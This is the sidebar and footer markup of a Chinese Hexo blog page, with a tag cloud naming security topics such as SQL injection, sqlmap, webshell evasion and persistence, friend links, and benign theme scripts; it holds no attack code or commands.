    <a href="/tags/sqlmap%E4%BD%BF%E7%94%A8/" style="font-size: 11.283819476801405px;" class="tag-cloud-link">sqlmap使用</a>
    
    <a href="/tags/dirsearch/" style="font-size: 16.650031731529165px;" class="tag-cloud-link">dirsearch</a>
    
    <a href="/tags/sql-%E6%B3%A8%E5%85%A5/" style="font-size: 18.248301708073736px;" class="tag-cloud-link">sql 注入</a>
    
    <a href="/tags/sqlmap/" style="font-size: 10.675051245213911px;" class="tag-cloud-link">sqlmap</a>
    
    <a href="/tags/%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2/" style="font-size: 16.723730111512815px;" class="tag-cloud-link">联合查询</a>
    
    <a href="/tags/pikachu/" style="font-size: 19.653176044546px;" class="tag-cloud-link">pikachu</a>
    
    <a href="/tags/virtrualbox/" style="font-size: 17.983451730397583px;" class="tag-cloud-link">virtrualbox</a>
    
    <a href="/tags/%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F/" style="font-size: 18.27288622745199px;" class="tag-cloud-link">小米范端口扫描</a>
    
    <a href="/tags/vue/" style="font-size: 16.080676993778553px;" class="tag-cloud-link">vue</a>
    
    <a href="/tags/waf/" style="font-size: 14.988275838933948px;" class="tag-cloud-link">waf</a>
    
    <a href="/tags/BurpSuite/" style="font-size: 8.251356937922512px;" class="tag-cloud-link">BurpSuite</a>
    
    <a href="/tags/nmap/" style="font-size: 17.940970802810092px;" class="tag-cloud-link">nmap</a>
    
    <a href="/tags/%E7%99%BE%E5%BA%A6%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/" style="font-size: 17.02666583572865px;" class="tag-cloud-link">百度谷歌语法</a>
    
    <a href="/tags/%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/" style="font-size: 10.46968409015671px;" class="tag-cloud-link">支付逻辑漏洞</a>
    
    <a href="/tags/%E5%BC%B1%E5%8F%A3%E4%BB%A4/" style="font-size: 14.018630201134492px;" class="tag-cloud-link">弱口令</a>
    
    <a href="/tags/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/" style="font-size: 18.146109234863466px;" class="tag-cloud-link">博客搭建</a>
    
    <a href="/tags/%E4%B8%BB%E9%A2%98%E9%85%8D%E7%BD%AE/" style="font-size: 17.34322636910592px;" class="tag-cloud-link">主题配置</a>
    
    <a href="/tags/sql%E7%BB%95%E8%BF%87/" style="font-size: 15.015716850046372px;" class="tag-cloud-link">sql绕过</a>
    
    <a href="/tags/sqlmap-tamper/" style="font-size: 9.641074817519856px;" class="tag-cloud-link">sqlmap tamper</a>
    
    <a href="/tags/sql%E6%8A%A5%E9%94%99%E5%87%BD%E6%95%B0/" style="font-size: 15.164134762178856px;" class="tag-cloud-link">sql报错函数</a>
    
    <a href="/tags/bool%E5%92%8C%E7%9D%A1%E7%9C%A0%E7%9B%B2%E6%B3%A8%E8%84%9A%E6%9C%AC/" style="font-size: 11.510779774910125px;" class="tag-cloud-link">bool和睡眠盲注脚本</a>
    
    <a href="/tags/ip%E5%92%8C%E8%B7%AF%E7%94%B1/" style="font-size: 15.704279130818833px;" class="tag-cloud-link">ip和路由</a>
    
    <a href="/tags/proxifier/" style="font-size: 14.442397697674837px;" class="tag-cloud-link">proxifier</a>
    
    <a href="/tags/wireshark%E6%8A%93%E5%8C%85/" style="font-size: 17.21985804441845px;" class="tag-cloud-link">wireshark抓包</a>
    
    <a href="/tags/webshall%E5%85%8D%E6%9D%80/" style="font-size: 15.0745084612149px;" class="tag-cloud-link">webshall免杀</a>
    
    <a href="/tags/%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/" style="font-size: 11.788280501329275px;" class="tag-cloud-link">一句话木马</a>
    
    <a href="/tags/windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" style="font-size: 9.899224184766982px;" class="tag-cloud-link">windows权限维持</a>
    
    <a href="/tags/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" style="font-size: 9.550015471502885px;" class="tag-cloud-link">Linux权限维持</a>
    
    <a href="/tags/Hackademic-RTB1/" style="font-size: 8.097068851041431px;" class="tag-cloud-link">Hackademic.RTB1</a>
    
    <a href="/tags/Medium/" style="font-size: 12.180265632547657px;" class="tag-cloud-link">Medium</a>
    
</div>
                
                
                <div class="friend-links tab-pane nav bs-sidenav fade" id="sidebar-friend-links">
    
    <li>
        <a href="http://kdays.net/days/" target="_blank">KDays Forum</a>
    </li>
    
    <li>
        <a href="http://www.gal123.com/" target="_blank">绅士导航♂</a>
    </li>
    
    <li>
        <a href="http://www.moe123.com/" target="_blank">萌导航</a>
    </li>
    
</div>
                
                
                <div class="links tab-pane nav bs-sidenav fade" id="sidebar-links">
    
    <li>
        <a href="https://github.com/tanlinhuitlh/" target="_blank">Github</a>
    </li>
    
    <li>
        <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
    </li>
    
    <li>
        <a href="https://www.zhihu.com/people/aonosora/activities" target="_blank">知乎</a>
    </li>
    
</div>
                
            </div>
        </div>
    </aside>
    
</aside>
            </div>
        </div>
    </div>
    <footer id="gal-footer">
    <div class="container">
        Copyright © 2018 明 尘 Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
    </div>
</footer>

<!-- 回到顶端 -->
<div id="gal-gotop">
    <i class="fa fa-angle-up"></i>
</div>
</body>

<script src="/js/activate-power-mode.js"></script>

<script>

    // 配置highslide
	hs.graphicsDir = '/js/highslide/graphics/'
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.lang.number = '共%2张图, 当前是第%1张';
    hs.addSlideshow({
      interval: 5000,
      repeat: true,
      useControls: true,
      fixedControls: "fit",
      overlayOptions: {
        opacity: 0.75,
        position: "bottom center",
        hideOnMouseOut: true
      }
    })

    // 初始化aos
    AOS.init({
      duration: 1000,
      delay: 0,
      easing: 'ease-out-back'
    });

</script>
<script>
	POWERMODE.colorful = 'true';    // make power mode colorful
	POWERMODE.shake = 'true';       // turn off shake
	// TODO 这里根据具体情况修改
	document.body.addEventListener('input', POWERMODE);
</script>
<script>
    window.slideConfig = {
      prefix: '/imgs/slide/background',
      ext: 'jpg',
      maxCount: '8'
    }
</script>

<script src="/js/hs.js"></script>
<script src="/js/blog.js"></script>




</html>